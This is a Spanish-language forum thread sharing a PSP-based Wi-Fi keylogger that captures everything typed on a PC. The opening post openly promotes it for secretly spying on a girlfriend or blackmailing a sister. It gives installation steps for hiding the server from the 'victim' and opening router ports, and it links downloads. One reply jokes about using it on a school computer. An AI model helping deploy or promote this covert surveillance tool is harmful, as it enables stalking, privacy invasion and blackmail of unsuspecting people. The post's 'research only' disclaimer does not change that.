[Keylogger Vía Wi-Fi] Mira lo que se escribe en el PC!!!!

BETA.PESEPE

soyoskar92 escribió:¿Sospechas que tu novia usa tu PC para hablar con otros? ¿Quieres "espiar" a tu hermana para chantajearla? Veras en la pantalla de tu portatil TODO lo que se escriba usando el teclado de tu PC. Tiene selector de conexiones WiFi, y podremos esconder el programa servidor para que nadie lo vea...

Mini-tutorial

¿Que nos ofrece?
Es un programa capaz de detectar todas las pulsaciones del PC y transmitirla a la pantalla de la PSP donde serán guardadas para su posterior analización.

Instalacion
Antes de nada, configura el WiFi de tu PSP. Es posible que necesites abrir el puerto 443 en tu router, para la IP del ordenador "victima". Para esto buscad en Google algun manual de abrir puertos para vuestro router concreto.

Copia la aplicación del PC a cualquier carpeta de tu ordenador junto con MSVBVM60.dll y MSWINSCK.OCX. Copia la carpeta PSP a la raíz de tu Memory Stick. Si te pide sobrescribir acepta.

Dentro de la carpeta ms0:\PSP\GAME\KeyLoggerPSP edita el archivo keylog.cfg introduciendo unicamente la IP del ordenador "victima"*** donde se este ejecutando el servidor (puedes usar simplemente el Bloc de Notas).

Como se usa
Ejecuta la aplicación en el PC. Para ocultar use el boton de ocultar y para voler a mostrar la pantalla pulse Escape y Insert a la vez en el teclado.

Ejecuta el programa de la PSP. Elige tu conexion. Después, tratará de conectarse con el PC. Un log será guardado en la raíz de la Memory Stick.

Posibles errores
Errores al conectarse: Puede deberse a una mala configuración del programa, del router, o un bug conocido pero que no está al alcance de este programa (se trata del Firm). Este bug se soluciona borrando todas las configuraciones de conexiones Wifi y volviendo a crearlas.
Error 'Address in use': Simplemente cambia el puerto de comunicación del server.

Nota: Este programa no está creado con fines más allá de la simple investigación.

***Si no sabes la IP de tu PC, la forma mas facil de encontrar esta informacion es, desde el PC donde se esta ejecutando el servidor, ir a "Inicio" -> "Ejecutar", escribir "cmd" y en la ventana negra que se abre escribir "ipconfig /all" sin las comillas. Se mostrara informacion similar a esta:

Imagen

Posibilidad de varias configuraciones para conectar a ordenadores (poder tener en la PSP mas de un ordenador configurado).
Server mas "discreto".
Posibilidad de cambiar el puerto en el server.
Se puede especificar el puerto a usar en las configuraciones del programa de la PSP.
El server es capaz de iniciarse aun teniendo el problema del puerto para posibilitar el cambio de este.
Arreglado un bug en el server que hacia desaparecer la ventana.
Arreglado el bug de la sensibilidad.

Aún así este ultimo bug no estoy muy seguro de su arreglo porque, depende también de la sensibilidad del teclado y de la configuración de Windows. El server tarda 5 milesimas mas en remapear el teclado.

DESCARGA MEDIAFIRE - PROGRAMA PARA PSP

DESCARGA MEDIAFIRE - SERVER PC

PD: Sí sufrís incompatibilidades o os va bien decidlo y actualizo

TESTEADO Y FUNCIONANDO EN :
3.40 OE-A

INCOMPATIBILIDADES EN :
decid decid XD

http://beta.pesepe.com/story/keylogger-psp
soleambeati está baneado por "Crearse clon para saltarse baneos"
¡Tremendisimo!, ¡fantabuloso! Me parece que este programa y el ordenador central de mi colegio haran muy buenas migas...
A veces es mejor no saberlo todo. ;)
oye crees que lo podrias explicar un poco mas claro no es que diga que no esta claro es que no entiendo muchas cosas
darck558 escribió:oye crees que lo podrias explicar un poco mas claro no es que diga que no esta claro es que no entiendo muchas cosas

Más claro imposible, y si no entiendes algo google, que es tu amigo.
Yo lo veo muy claro.
no citas ni al autor, ni enlazas a la fuente de donde lo has sacado (mas que nada para futuras actualizaciones).

Me parece una ENORME falta de respeto.
Unicorn escribió:no citas ni al autor, ni enlazas a la fuente de donde lo has sacado (mas que nada para futuras actualizaciones).

Me parece una ENORME falta de respeto.

LOL puse la fuente, pero en eol no se permiten links externos.
POR SI TE INTERESA, BETA.PESEPE OJOAS, DE DONDE SINO?
6 respuestas